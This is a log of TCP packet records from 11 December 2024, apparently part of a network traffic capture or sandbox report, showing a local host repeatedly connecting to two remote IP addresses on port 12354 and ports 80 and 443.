Dec 11, 2024 16:28:42.770777941 CET	80	51306	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:42.770790100 CET	80	51556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:42.770828962 CET	51306	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.770895958 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.771817923 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:42.889841080 CET	12354	51554	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.889889002 CET	51554	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.890016079 CET	51554	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.890029907 CET	12354	51554	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.890050888 CET	12354	51555	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.890449047 CET	51572	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:42.891374111 CET	12354	51555	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:42.892218113 CET	80	51556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:43.009304047 CET	12354	51554	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.010098934 CET	12354	51554	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.010112047 CET	12354	51572	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.012183905 CET	51572	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.015557051 CET	51572	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.135886908 CET	12354	51572	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.200999975 CET	51581	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.320199013 CET	12354	51581	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.323609114 CET	51581	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.323987961 CET	51581	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.443300009 CET	12354	51581	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.443322897 CET	12354	51581	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.443378925 CET	51581	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.443552017 CET	51581	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.444324017 CET	51588	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.563164949 CET	12354	51581	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.563179970 CET	12354	51581	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.563862085 CET	12354	51588	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:43.563924074 CET	51588	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.565654039 CET	51588	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:43.685939074 CET	12354	51588	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:44.339263916 CET	80	51556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:44.339344025 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:44.429223061 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:44.429255962 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:44.429426908 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:44.430640936 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:44.430668116 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:45.127397060 CET	12354	51572	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.127480030 CET	51572	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.127788067 CET	51572	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.127996922 CET	51685	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.247107029 CET	12354	51572	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.247242928 CET	12354	51685	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.247304916 CET	51685	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.247431040 CET	51685	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.367228031 CET	12354	51685	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.367263079 CET	12354	51685	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.367285013 CET	51685	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.367652893 CET	51685	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.368155003 CET	51701	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.486627102 CET	12354	51685	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.486968994 CET	12354	51685	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.487433910 CET	12354	51701	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.488271952 CET	51701	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.488419056 CET	51701	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.608345985 CET	12354	51701	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.608479977 CET	12354	51701	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.609179020 CET	51717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.676764965 CET	12354	51588	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.678419113 CET	51588	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.688838005 CET	51588	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.729149103 CET	12354	51717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.732268095 CET	51717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.733962059 CET	51717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.737284899 CET	51724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.808317900 CET	12354	51588	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.851887941 CET	12354	51717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.853288889 CET	12354	51717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.853358030 CET	51717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.853630066 CET	51717	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.853975058 CET	51733	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.856754065 CET	12354	51724	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.856811047 CET	51724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.856950045 CET	51724	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.972696066 CET	12354	51717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.972959042 CET	12354	51717	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.973308086 CET	12354	51733	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.973381996 CET	51733	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.973587990 CET	51733	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:45.976336956 CET	12354	51724	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.976444960 CET	12354	51724	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:45.979854107 CET	51741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.095581055 CET	12354	51733	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.095843077 CET	12354	51733	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.099701881 CET	51748	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.102255106 CET	12354	51741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.102397919 CET	51741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.102538109 CET	51741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.126250029 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.126331091 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.127049923 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.127094030 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.130966902 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.130975008 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.131244898 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.131413937 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.132174015 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.175323963 CET	443	51645	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.219156027 CET	12354	51748	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.219263077 CET	51748	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.219393015 CET	51748	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.222400904 CET	12354	51741	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.339392900 CET	12354	51748	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.647164106 CET	51748	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.647212982 CET	51741	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.647380114 CET	51645	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.649051905 CET	51783	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.771538973 CET	12354	51783	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.771663904 CET	51783	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.772186041 CET	51783	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.806216002 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.806500912 CET	51789	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.807195902 CET	51790	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.892205954 CET	12354	51783	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.892220020 CET	12354	51783	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.892369032 CET	51783	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.892369032 CET	51783	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.892687082 CET	51797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.925776958 CET	80	51556	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.925790071 CET	80	51789	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:46.925854921 CET	51556	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.925893068 CET	51789	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.926089048 CET	51789	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:46.926472902 CET	12354	51790	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:46.926533937 CET	51790	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:46.926657915 CET	51790	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.011643887 CET	12354	51783	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.011655092 CET	12354	51783	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.012015104 CET	12354	51797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.012223005 CET	51797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.012892962 CET	51797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.046138048 CET	80	51789	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:47.046152115 CET	80	51789	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:47.046221972 CET	51789	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:47.046451092 CET	12354	51790	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.046891928 CET	12354	51790	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.049714088 CET	51789	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:47.058613062 CET	51807	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.132822037 CET	12354	51797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.165983915 CET	80	51789	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:47.169667006 CET	80	51789	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:47.177881002 CET	12354	51807	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.177970886 CET	51807	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.178245068 CET	51807	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:47.182240963 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:47.460263968 CET	12354	51807	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:47.464924097 CET	80	51815	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:47.465069056 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:47.465163946 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:47.584592104 CET	80	51815	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:49.023709059 CET	80	51815	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:49.023755074 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:49.068665028 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:49.068697929 CET	443	51915	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:49.068770885 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:49.073127985 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:49.073143959 CET	443	51915	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:49.128879070 CET	12354	51797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.128947020 CET	51797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.130187988 CET	51797	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.130347013 CET	51919	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.249768972 CET	12354	51797	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.250092030 CET	12354	51919	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.251779079 CET	51919	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.251941919 CET	51919	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.300970078 CET	12354	51807	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.305036068 CET	51931	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.305039883 CET	51807	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.305039883 CET	51807	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.371381998 CET	12354	51919	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.424547911 CET	12354	51931	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.424568892 CET	12354	51807	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.424864054 CET	51931	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.424864054 CET	51931	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.546667099 CET	12354	51931	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.547023058 CET	12354	51931	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.547719002 CET	51946	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.668565989 CET	12354	51946	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:49.672624111 CET	51946	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.672943115 CET	51946	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:49.793219090 CET	12354	51946	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:50.759233952 CET	443	51915	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:50.759360075 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.759973049 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.759979010 CET	443	51915	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:50.761532068 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.761569977 CET	443	51915	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:50.761626005 CET	51915	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.772592068 CET	51919	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.772633076 CET	51946	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.773056030 CET	52745	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.869323015 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.869601011 CET	52791	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.885000944 CET	52813	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.892374039 CET	12354	52745	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:50.892499924 CET	52745	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.893042088 CET	52745	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:50.989320993 CET	80	51815	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:50.989356995 CET	80	52791	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:50.989397049 CET	51815	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.989428997 CET	52791	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:50.990211964 CET	52791	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.004313946 CET	12354	52813	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.004379034 CET	52813	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.005116940 CET	52813	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.012104988 CET	12354	52745	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.012165070 CET	52745	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.012243986 CET	12354	52745	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.012653112 CET	52745	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.013205051 CET	52929	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.108985901 CET	80	52791	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.109040976 CET	52791	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.109582901 CET	80	52791	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.109725952 CET	52791	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.125299931 CET	12354	52813	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.125653028 CET	52813	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.126059055 CET	12354	52813	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.126302004 CET	52997	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.126532078 CET	52813	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.132883072 CET	12354	52745	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.133243084 CET	12354	52745	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.133759975 CET	12354	52929	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.133827925 CET	52929	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.134226084 CET	52929	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.228394032 CET	80	52791	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.228959084 CET	80	52791	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.232419968 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.244963884 CET	12354	52813	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.245549917 CET	12354	52997	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.245671988 CET	12354	52813	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.245738983 CET	52997	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.251389980 CET	52997	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.253410101 CET	12354	52929	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.253545046 CET	12354	52929	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.253597975 CET	52929	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.254875898 CET	52929	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.255575895 CET	53093	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.351716995 CET	80	53081	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.351800919 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.352843046 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:51.370848894 CET	12354	52997	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.372903109 CET	12354	52929	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.374125957 CET	12354	52929	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.374824047 CET	12354	53093	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.374905109 CET	53093	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.375408888 CET	53093	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.472529888 CET	80	53081	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:51.495486021 CET	12354	53093	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.495579004 CET	53093	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.495609045 CET	12354	53093	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.516948938 CET	53093	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.517452955 CET	53303	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.619440079 CET	12354	53093	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.640650988 CET	12354	53093	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.641140938 CET	12354	53303	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.641721010 CET	53303	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.641721010 CET	53303	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.761240005 CET	12354	53303	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.761683941 CET	12354	53303	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.762418985 CET	53634	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.881880045 CET	12354	53634	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:51.881953001 CET	53634	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:51.892942905 CET	53634	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.001581907 CET	12354	53634	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.001724958 CET	53634	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.001950026 CET	53634	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.002474070 CET	53844	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.013638020 CET	12354	53634	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.122179985 CET	12354	53634	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.122195959 CET	12354	53634	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.122380972 CET	12354	53844	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.122442007 CET	53844	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.123445034 CET	53844	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.246985912 CET	12354	53844	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.247049093 CET	53844	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.247714996 CET	53844	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.247736931 CET	12354	53844	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.248742104 CET	54065	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.457067013 CET	12354	53844	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.457282066 CET	12354	53844	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.457405090 CET	12354	54065	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.457479954 CET	54065	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.457941055 CET	54065	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.577296972 CET	12354	54065	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.577383995 CET	54065	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.577605963 CET	54065	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.577702045 CET	12354	54065	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.578085899 CET	54328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.696719885 CET	12354	54065	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.696794033 CET	12354	54065	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.697309971 CET	12354	54328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.697397947 CET	54328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.697993040 CET	54328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.817935944 CET	12354	54328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.818234921 CET	12354	54328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.818312883 CET	54328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.818411112 CET	54328	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.819289923 CET	54492	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.922535896 CET	80	53081	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:52.922593117 CET	53081	80	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:52.937695980 CET	12354	54328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.937721968 CET	12354	54328	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.938695908 CET	12354	54492	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:52.939169884 CET	54492	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:52.955271959 CET	54492	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.032224894 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:53.032250881 CET	443	54642	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:53.032324076 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:53.033615112 CET	54642	443	192.168.2.7	202.108.0.52
Dec 11, 2024 16:28:53.033628941 CET	443	54642	202.108.0.52	192.168.2.7
Dec 11, 2024 16:28:53.059968948 CET	12354	54492	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.062993050 CET	54492	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.062993050 CET	54492	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.062993050 CET	54683	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.076247931 CET	12354	54492	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.182265043 CET	12354	54492	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.182322025 CET	12354	54492	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.182332993 CET	12354	54683	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.182471991 CET	54683	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.182786942 CET	54683	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.303605080 CET	12354	54683	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.363857031 CET	12354	52997	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.364545107 CET	52997	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.372102022 CET	52997	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.372591972 CET	54740	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.491389036 CET	12354	52997	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.492202044 CET	12354	54740	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.492600918 CET	54740	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.493174076 CET	54740	12354	192.168.2.7	107.163.241.232
Dec 11, 2024 16:28:53.613188982 CET	12354	54740	107.163.241.232	192.168.2.7
Dec 11, 2024 16:28:53.613698006 CET	12354	54740	107.163.241.232	192.168.2.7
